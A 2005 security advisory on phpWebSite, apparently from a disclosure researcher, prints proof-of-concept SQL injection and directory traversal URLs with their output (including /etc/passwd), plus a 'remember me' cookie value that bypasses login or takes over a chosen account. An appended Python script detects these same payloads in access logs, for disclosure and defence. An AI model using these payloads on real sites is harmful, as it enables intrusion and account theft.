Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

Get Dcrab's Services to audit your Web servers, scripts, networks, etc., or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005

Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted and patch has been released
Summary: There are multiple SQL injection, authentication bypass and directory traversal vulnerabilities in Phpwebsite.

Proof of Concept Exploits:

www.example.com/phpwebsite/index.php?module='&search_op=search&mod=all&query=1&search=Search
SQL injection

DB Error: syntax error
SELECT show_block, block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod='&query=1&search=Search
SQL injection

DB Error: syntax error
SELECT block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search
Directory traversal

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News

Log into a user account with "remember me" checked, then delete all the cookies besides the one named [mod_users][rememberme].
Cookie name: *an md5 hash set by the website*[mod_users][rememberme]
Value: a' or 'a' = 'a
You can also steal specific user accounts by setting the cookie value to a' or user_id = '5'

Solution:
The vendors were contacted via email and responded quickly. The issue was communicated to them, after which a patch was released on their official website.

You can get the security patch at http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_patch_20050705.2.tgz

Keep yourself updated. RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com. Please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon-to-be-released book on Secure coding with PHP.

--------------------------------------------------------------------------------
Sincerely,
Diabolic Crab
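As an added example (not part of the advisory, and not phpWebSite code), the following Python detection logic classifies web-server access-log requests against the three indicator classes the advisory describes: SQL metacharacters in the module= and mod= parameters, traversal sequences and null bytes in mod=, and a remember-me cookie value that is not a plain token. The Apache "combined" log format, the module-name whitelist, the expected token shape and the sample log lines are all assumptions constructed for this example.

```python
"""Detection logic for the three phpWebSite issues in the advisory above,
run over constructed access-log lines.

This is an added example, not code from the advisory or from phpWebSite.
Assumptions: the log is Apache "combined" format; a legitimate module name
is a short [A-Za-z0-9_] identifier; a legitimate remember-me token contains
only alphanumerics. The sample log lines are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed shape of a legitimate phpWebSite module name (module= and mod=).
MODULE_NAME = re.compile(r"[A-Za-z0-9_]+")

# Assumed shape of a legitimate token in the <md5>[mod_users][rememberme]
# cookie named in the advisory.
REMEMBER_ME_TOKEN = re.compile(r"[A-Za-z0-9]+")

# Apache "combined" log line: client, ident, user, time, request line, status, size, ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(target: str) -> list[str]:
    """Return the advisory indicator classes matched by one request target.

    Only index.php requests are inspected. For each module= / mod= value the
    traversal test runs first, because a traversal payload also fails the
    module-name whitelist and would otherwise be misreported as injection.
    """
    findings = []
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return findings
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in ("module", "mod"):
        for decoded_once in params.get(name, []):
            # parse_qs already percent-decoded once; a second pass exposes
            # double-encoded payloads such as %2527 (-> %27 -> ').
            value = unquote(decoded_once)
            if not value:
                continue
            if "\x00" in value or "../" in value or "..\\" in value:
                findings.append(f"directory-traversal:{name}")
            elif MODULE_NAME.fullmatch(value) is None:
                findings.append(f"sql-injection:{name}")
    return findings


def remember_me_value_is_suspicious(cookie_value: str) -> bool:
    """Whitelist check for the remember-me cookie value.

    The advisory's bypass supplies a value like  a' or 'a' = 'a ; anything
    outside the assumed alphanumeric token shape is treated as an attack.
    """
    return REMEMBER_ME_TOKEN.fullmatch(cookie_value) is None


def scan_log(lines):
    """Return (client ip, request target, findings) for each flagged line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue  # unparseable line: skip rather than guess
        findings = classify_request(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample log: one benign search, the advisory's two PoC shapes,
# a double-encoded variant, and an unrelated static-file request.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jul/2005:10:00:01 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=all&query=php&search=Search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Jul/2005:10:00:05 +0000] "GET /phpwebsite/index.php?module=\'&search_op=search&mod=all&query=1&search=Search HTTP/1.1" 200 834 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Jul/2005:10:00:09 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search HTTP/1.1" 200 1290 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Jul/2005:10:00:12 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=%2527&query=1&search=Search HTTP/1.1" 200 834 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2005:10:01:00 +0000] "GET /phpwebsite/images/logo.png HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(findings), target)
    print("cookie check:", remember_me_value_is_suspicious("a' or 'a' = 'a"))
```

Run as a script, it flags the three non-benign sample lines and nothing else. The same whitelist idea is the shape of the application-side fix: a value that is not a known module name should be rejected before it reaches a SQL string or a file path, and a remember-me token should be compared against the stored one as opaque data, never interpolated into a query. Whether the vendor's patch does exactly this is not stated in the advisory.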